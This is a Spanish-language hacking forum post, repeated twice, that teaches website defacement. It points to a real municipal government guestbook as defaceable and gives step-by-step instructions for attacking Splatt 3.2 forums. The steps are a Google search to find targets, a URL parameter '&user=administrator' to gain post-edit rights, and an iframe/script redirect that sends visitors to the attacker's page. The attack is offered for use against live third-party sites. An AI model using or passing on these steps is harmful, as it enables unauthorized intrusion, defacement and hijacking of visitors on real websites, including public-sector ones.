Que es un deface o defacing?
En cortas palabras, un deface o defacing es una modificación de un portal o web sin autorización del administrador, casi siempre va dirigido al index de la web para que sea mas llamativo. Como ya sabéis todo tiene una ética.. para poder hacer un deface necesitas explotar una vulnerabilidad del servidor o del portal, una vez has conseguido entrar en el servidor es donde tienes que demostrar tu nivel de ética.
Vulnerabilidades Mas Comunes :
SQLInjected
XSS
RFI/LFI
HTML Injected
las otras son mucho mas elaboradas para poder explotarlas...
Aca les dejo un simple ejemplo en el libro de visitas de mi municipalidad xD... para ke vean practicamente lo ke es un deface
... http://www.muncrosales.gov.ar/libro_visita.asp ( espero ke no lo arreglen )
weno... para la gente ke siempre alguna vez se imagino ser el mejor hacker del mundo xD pensando ke era una pavada...voy a explicar una vulnerabilidad muy conocida en los foros Splatt 3.2... PRACTICAMENTE NO TEORICAMENTE, porque para los que recien empiezan es un bajon leer ya 4 paginas sin nada de accion ... enfin...
DEFACE A FOROS SPLATT 3.2
googlear el foro : "splatt forum © by splatt.it" < eso en google...
aca encontre un foro vulnerable "http://***/nedivxmusic/index.php"
ahora vamos a un post, por ejemplo, este
ahi yo marque... apretamos en edit, y nos va a decir que no tenemos permisos para cambiar este archivo...ok...
se quedan en esa pagina, y ahi explotan la vulnerabilidad sql injected en esta pagina... que hariamos lo siguiente...
agarramos la url : http://***/nedivxmusic/modules.php?op=modload&name=Forums&file=editpost&post_id=854&topic=479&forum=1
agergamos : &user=administrator
o sea nos keda asi la url : http://***/nedivxmusic/modules.php?op=modload&name=Forums&file=editpost&post_id=854&topic=479&forum=1&user=administrator
esta pagina por ejemplo, tiene el codigo html ON.... busquen los codigos html o usen dreamweaver o algo parecido, y hagan lo ke se les canta, el mejor deface que se me ocurre a mi hacer ahi, usar <iframe> con java para que la pagina redireccione en menos de un segundo a tu pagina. eso busquenlo bien en google, esta tambien esta misma guia repetida 500 veces... pero weno... por ahi alguno siempre se queda con una duda de leer una guia... y puede ver otra y aclarar las cosas, no ?...
gracias ParkZ Inc
En cortas palabras, un deface o defacing es una modificación de un portal o web sin autorización del administrador, casi siempre va dirigido al index de la web para que sea mas llamativo. Como ya sabéis todo tiene una ética.. para poder hacer un deface necesitas explotar una vulnerabilidad del servidor o del portal, una vez has conseguido entrar en el servidor es donde tienes que demostrar tu nivel de ética.
Vulnerabilidades Mas Comunes :
SQLInjected
XSS
RFI/LFI
HTML Injected
las otras son mucho mas elaboradas para poder explotarlas...
Aca les dejo un simple ejemplo en el libro de visitas de mi municipalidad xD... para ke vean practicamente lo ke es un deface
... http://www.muncrosales.gov.ar/libro_visita.asp ( espero ke no lo arreglen )
weno... para la gente ke siempre alguna vez se imagino ser el mejor hacker del mundo xD pensando ke era una pavada...voy a explicar una vulnerabilidad muy conocida en los foros Splatt 3.2... PRACTICAMENTE NO TEORICAMENTE, porque para los que recien empiezan es un bajon leer ya 4 paginas sin nada de accion
... enfin...
DEFACE A FOROS SPLATT 3.2
googlear el foro : "splatt forum © by splatt.it" < eso en google...
aca encontre un foro vulnerable "http://***/nedivxmusic/index.php"
ahora vamos a un post, por ejemplo, este
ahi yo marque... apretamos en edit, y nos va a decir que no tenemos permisos para cambiar este archivo...ok...
se quedan en esa pagina, y ahi explotan la vulnerabilidad sql injected en esta pagina... que hariamos lo siguiente...
agarramos la url : http://***/nedivxmusic/modules.php?op=modload&name=Forums&file=editpost&post_id=854&topic=479&forum=1
agergamos : &user=administrator
o sea nos keda asi la url : http://***/nedivxmusic/modules.php?op=modload&name=Forums&file=editpost&post_id=854&topic=479&forum=1&user=administrator
esta pagina por ejemplo, tiene el codigo html ON.... busquen los codigos html o usen dreamweaver o algo parecido, y hagan lo ke se les canta, el mejor deface que se me ocurre a mi hacer ahi, usar <iframe> con java para que la pagina redireccione en menos de un segundo a tu pagina. eso busquenlo bien en google, esta tambien esta misma guia repetida 500 veces... pero weno... por ahi alguno siempre se queda con una duda de leer una guia... y puede ver otra y aclarar las cosas, no ?...
gracias
ParkZ Inc